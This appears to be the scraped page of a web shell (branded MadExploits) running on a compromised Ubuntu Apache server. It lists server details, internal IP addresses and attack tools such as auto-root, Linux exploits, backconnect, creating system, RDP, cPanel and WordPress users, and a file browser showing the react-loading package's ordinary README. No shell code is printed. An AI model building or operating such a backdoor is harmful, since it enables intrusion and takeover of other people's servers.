Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
react-loading /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
README.md
1.44
KB
-rw-rw-r--
index.d.ts
461
B
-rw-rw-r--
jest.setup.js
126
B
-rw-rw-r--
package.json
2.31
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# react-loading [](https://travis-ci.org/fakiolinho/react-loading) [](https://coveralls.io/github/fakiolinho/react-loading?branch=master) Easy to use loading animations for React projects. Uses SVG animations from Brent Jackson's [loading](https://github.com/jxnblk/loading) project. ## Installation ``` npm i react-loading ``` or ``` yarn add react-loading ``` ## Demo Check [here](https://codesandbox.io/s/mqx0ql55qp) ## Loading Types * blank * balls * bars * bubbles * cubes * cylon * spin * spinningBubbles * spokes ## Examples ```javascript import React from 'react'; import ReactLoading from 'react-loading'; const Example = ({ type, color }) => ( <ReactLoading type={type} color={color} height={667} width={375} /> ); export default Example; ``` ```javascript import React from 'react'; import ReactLoading from 'react-loading'; const Example = ({ type, color }) => ( <ReactLoading type={type} color={color} height={'20%'} width={'20%'} /> ); export default Example; ``` ### Props | Name | Type | Default Value | |:------:|:------:|:---------------:| | type | String | balls | | color | String | `#ffffff` | | delay | Number | 0 (msecs) | | height | Number or String | 64 (px) | | width | Number or String | 64 (px) | | className | String | `''` | ## License MIT
Close